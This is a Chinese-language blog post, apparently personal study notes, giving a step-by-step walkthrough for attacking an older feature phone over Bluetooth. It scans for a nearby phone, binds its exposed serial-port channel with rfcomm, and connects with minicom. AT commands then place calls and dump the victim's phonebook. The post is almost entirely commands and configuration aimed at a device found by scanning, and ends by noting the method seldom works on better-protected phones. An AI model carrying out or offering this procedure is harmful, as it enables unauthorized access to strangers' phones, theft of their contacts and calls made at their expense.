![蓝牙安全1:通过低版本蓝牙渗透手机 - xiao106347 - 学习笔记](http://img1.ph.126.net/S63FPgm4_VMinxcK2cLWQQ==/834291831070399198.jpg)
平台:kali_linux #因为kali自带很对安全审计工具,无需单独一个一个安装
目标:某品牌功能手机 #蓝牙版本较低,有可利用的漏洞
准备: 因为攻击平台已经集成很多安全审计工具,这里只需要安装一个软件:minicom
apt-get install minicom
ok,开始工作!
1.查看自己主机的蓝牙设备
hciconfig #可以看到本机蓝牙设备为hci0
2.加载蓝牙设备
hciconfig hcix up #加载本机蓝牙设备hci0
3.搜索周围的蓝牙设备
hcitool -i hcix scan #搜索到一功能手机开了蓝牙功能(Fuck Me!)
4.浏览目标设备所有可用服务
sdptool browse mac #扫描目标蓝牙的mac
![蓝牙安全1:通过低版本蓝牙渗透手机 - xiao106347 - 学习笔记](http://img1.ph.126.net/xYkZMWooL1ycmrlIAH43QA==/6608200122863997793.png)
5.查看到目标蓝牙有“Serial Port0”,这正是这里所要利用的漏洞,这里频道为11;打开/etc/bluetooth/rfcomm.conf,去掉下面段的注释符,并修改device和channel与目标主机相同;保存退出!
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img2.ph.126.net/2BHEqIPetnJQBfqPPL4SFQ==/6599299576237621925.png)
6.与目标蓝牙设备建立映射:
rfcomm bind /dev/rfcomm0
7.配置minicom:
输入minicom -m -s进入setup模式;
选择Serial port setup:
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img2.ph.126.net/yeOkodfafIoWP2byus66Eg==/804455483539065320.png)
设置Serial Device 为/dev/rfcomm0 #这里与前面的映射设备相同
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img1.ph.126.net/UP6Z5BSKXl7zjUURswvDZQ==/56857945395898423.png)
Save setup as dfl #回车保存
Exit from Minicom #退出
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img1.ph.126.net/LrcMw83iVoll6j5z1c3Dkw==/804455483539065325.png)
8.开始控制目标手机:
输入minicom -m #开始控制目标手机,此时目标手机会出现一个“串口已连接”的窗口一闪而过!
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img2.ph.126.net/4RGdykbWVC7CkO0ugdmh0A==/3676626145894594679.png)
在该窗口输入atdt xxxxx(电话号码) #拨打电话
输入at+cpbr=1,80 #显示目标手机电话簿,这里1为从第一个开始显示,80为到第80个结束显示
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img0.ph.126.net/7JNqJc2g5WCmem_OGFTakw==/3246813856457620773.png)
更多功能按alt+z键!
![蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记](http://img2.ph.126.net/woFvmduqWsMzcBhVOWbhdw==/3334634049191658767.png)
总结:
通常好的手机段都有认证机制,故链接串口会弹出允许连接框,所以很难做到,无后台链接,不推荐使用以上方法。